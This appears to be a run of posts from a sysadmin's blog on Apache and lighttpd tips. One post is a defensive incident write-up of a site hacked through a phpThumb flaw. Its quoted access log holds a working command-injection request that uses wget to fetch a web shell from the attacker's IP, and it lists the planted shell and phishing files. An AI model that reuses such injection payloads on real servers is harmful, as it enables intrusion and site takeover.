http://healyourchurchwebsite.com/2008/05/27/how-to-block-spambots-by-user-agent-using-htaccess/
# redirect spambots & rogue spiders to the end of the internet
Options +FollowSymlinks
RewriteEngine On
RewriteBase /
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSearch [OR]
RewriteCond %{HTTP_USER_AGENT} ^Microsoft\ URL [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector
RewriteRule .* - [F,L]
Today, i got an urgent message about a website, which actually got hacked due to an opensource PHP library for Image Modification operations ‘phpThumb’. phpThumb have published a security update end of last year (August 2011) but it was not updated on server.
Vulnerability is mentioned here …
http://secunia.com/advisories/39556
The hacker footprint was …
I fetched all files changes in last 2 days … by going to public_html and running
# find ./ -type f -ctime -2 -exec ls -lcr {} \; > ../last-activity.txt
Interesting results … The Web Shell, Perl and PHP files …
-rw-r–r– 1 user user 24911 May 15 08:08 ./phpthumb/filess.php
-rw-r–r– 1 user user 4549 May 15 08:10 ./phpthumb/cp.txt
-rw-r–r– 1 user user 1076 May 15 08:13 ./phpthumb/confspy.log
-rw-r–r– 1 user user 24911 May 15 08:08 ./phpthumb/filess.php.1
-rw-r–r– 1 user user 194113 May 15 10:09 ./config.php
and The Phising Codes
-rw-r–r– 1 user user 28469 May 15 11:36 ./webmail.uncfsu.edu.zip
-rw-r–r– 1 user user 3669 May 15 11:37 ./webmail.uncfsu.edu/login_files/flogon.js
-rw-r–r– 1 user user 1144 May 15 11:37 ./webmail.uncfsu.edu/login_files/lgnexlogo.gif
-rw-r–r– 1 user user 2512 May 15 11:37 ./webmail.uncfsu.edu/login_files/lgntopr.gif
-rw-r–r– 1 user user 3461 May 15 11:37 ./webmail.uncfsu.edu/login_files/owafont.css
-rw-r–r– 1 user user 2310 May 15 11:37 ./webmail.uncfsu.edu/login_files/logon.css
…………………
-rw-r–r– 1 user user 222219 May 15 15:08 ./chaseupdating.zip
-rw-r–r– 1 user user 1245 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK.php
-rw-r–r– 1 user user 5692 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/Logon.php
-rw-r–r– 1 user user 316 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/index.php
-rw-r–r– 1 user user 29742 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/details.php
-rw-r–r– 1 user user 323 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/default_bg.gif
-rw-r–r– 1 user user 1556 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/search_button_home.gif
-rw-r–r– 1 user user 121 May 15 15:37 ./chaseupdating/chaseupdating/onlinesecurity/M3DiJoK/curvebg_darkblue_right.gif
Visiting Access Logs, explored exact details of the intruder actions …
41.138.185.64 – - [15/May/2012:08:08:51 -0600] “GET /vendors/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://41.138.185.64/filess.php;%20&phpThumbDebug=9 HTTP/1.1″ 200 48077 “-” “Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62″
41.138.185.64 – - [15/May/2012:08:08:58 -0600] “GET /vendors/phpthumb/filess.php HTTP/1.1″ 200 471 “-” “Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62″
41.138.185.64 – - [15/May/2012:10:09:26 -0600] “GET /config.php HTTP/1.1″ 302 378 “-” “Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.229 Version/11.62″
Looking Dangerous ?
…………………
Solution:
1.) Remove the infection from the files
2.) Ensure there as no php shells left behind
3.) Upgrade the software and keep upgrading.
http://www.webhostingtalk.com/showthread.php?t=972669
A must do thing is to keep an eye on http://secunia.com/advisories about vulnerabilities detected time by time.
I would suggest to make a gdocs file to track the all such cases. for e.g.
3rd party libs | installed version | released version | last check date.
Few days back, i was optimizing performance of a website. After all benchmark probes placed … i detected that the echo() statement is taking almost 1.6s just to print the $string variable of size around 100K. It sound very pathetic when all your DB fetching and other things are under 0.1s and echo() is taking 1.6s. It reminded me about the website phpsadness.com (that log the big issues of php) shared by my colleague (kadnan) few days back
Actual problem …
$t1 = microtime(true); echo $html; $t2 = microtime(true); echo ($t2-$t1);
I researched on web, and found that it is a known issue with PHP’s Nagle’s Algorithm that is used in echo function.
I alternatively used print() but still it decreased to 1.1s but still not that i want.
A solution was proposed, to split the string in small pieces and then echo … it improved till 1s, but still not that i want.
http://www.php.net/manual/en/function.echo.php#52881
function echobig($string, $bufferSize = 8192) {
$splitString = str_split($string, $bufferSize);
foreach($splitString as $chunk) {
echo $chunk;
}
}
Promising Solution
i got this comment from a blog …
http://wonko.com/post/seeing_poor_performance_using_phps_echo_statement_heres_why#comment-5607
Guys, I think I narrowed it down even further!
As previously said, PHP buffering will let PHP race to the end of your script, but after than it will still “hang” while trying to pass all that data to Apache.
Now I was able, not only to measure this (see previous comment) but to actually eliminate the waiting period inside of PHP. I did that by increasing Apache’s SendBuffer with the SendBufferSize directive.
This pushes the data out of PHP faster. I guess the next step would be to get it out of Apache faster but I’m not sure if there is actually another configurable layer between Apache and the raw network bandwidth.
This seems very promising, as peoples commented … and i’ll be going to try it very soon.
Reference:
http://wonko.com/post/seeing_poor_performance_using_phps_echo_statement_heres_why
http://phplens.com/lens/php-book/optimizing-debugging-php.php
http://www.php.net/manual/en/function.echo.php#52881
In lighttpd, to disabled PDF opening in browser, add following config files at lighttpd.conf. This is useful in increasing CTR as browsers usually get stucked while loading PDF files.
$HTTP["url"] =~ "(.*)\.pdf" {
mimetype.assign = (".pdf" =>"application/octet-stream")
setenv.add-response-header = ( "Content-Disposition" => "attachment" )
}
+ Dont forget to enable setenv module, if not already done …
server.modules += ( "mod_setenv" )
This is lighttpd version of my previous thread using apache.
Sources:
http://symkat.com/tag/content-disposition/
http://www.cyberciti.biz/faq/mod_setenv-lighttpd-send-custom-headers/
I was searching for send some parameters using query string … so i come to know few things …
1. There is a limitation of 256 char (max) on client’s browser.
2. But if you use CURL or fopen to pass querystring data, On apache server, limit can be controlled by param ‘limitrequestfieldsize‘
You can limit the size of allowed data also by the server.
See http://httpd.apache.org/docs/2.2/en/…questfieldsize
The default configuration in Apache HTTP-Server allows only 4094 bytes.
Ref: http://bytes.com/topic/php/answers/658657-_get-parameter-size-limit
Sharing some online gzip testing tools for knowing if gzip is enabled on server or not.
2. http://www.gidnetwork.com/tools/gzip-test.php
3. http://nontroppo.org/tools/gziptest/ (browser based testing)
Just add this line in .htaccess file, and it’ll force PDF file to download rather than opening it on adobe reader.
<FilesMatch “.(?i:(pdf|mp3))$”>
<IfModule mod_headers.c>
ForceType application/octet-stream
Header set Content-Disposition attachment
</IfModule>
</FilesMatch>
Here are the helpful links …
1. http://www.thingy-ma-jig.co.uk/blog/06-08-2007/force-a-pdf-to-download
2. http://www.askapache.com/htaccess/using-http-headers-with-htaccess.html
For Lighttpd … follow this link
Last night, i faced a server issue, that a robot with empty user agent was eating my CPU (i guess) and bandwidth.
Similar issue was discussed on this thread
http://www.namepros.com/web-hosting-discussion/588889-unknown-bots-eating-up-my-valuable.html
So, i found a solution to block such request on apache level.
Blocking empty user agents is simple in lighttpd. Edit your lighttpd.conf as follows:
Ensure that mod_access is loaded:
server.modules = ( "mod_accesslog", "mod_access", … other modules … )
Add the following line:
$HTTP["useragent"] == ""
{ url.access-deny = ( "" )}
Reload the lighttpd configuration and you’re done.
Enable mod_rewrite and add the following to your configuration:
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule ^.* - [F]
more details here …
http://johannburkard.de/blog/www/spam/block-empty-user-agent.html
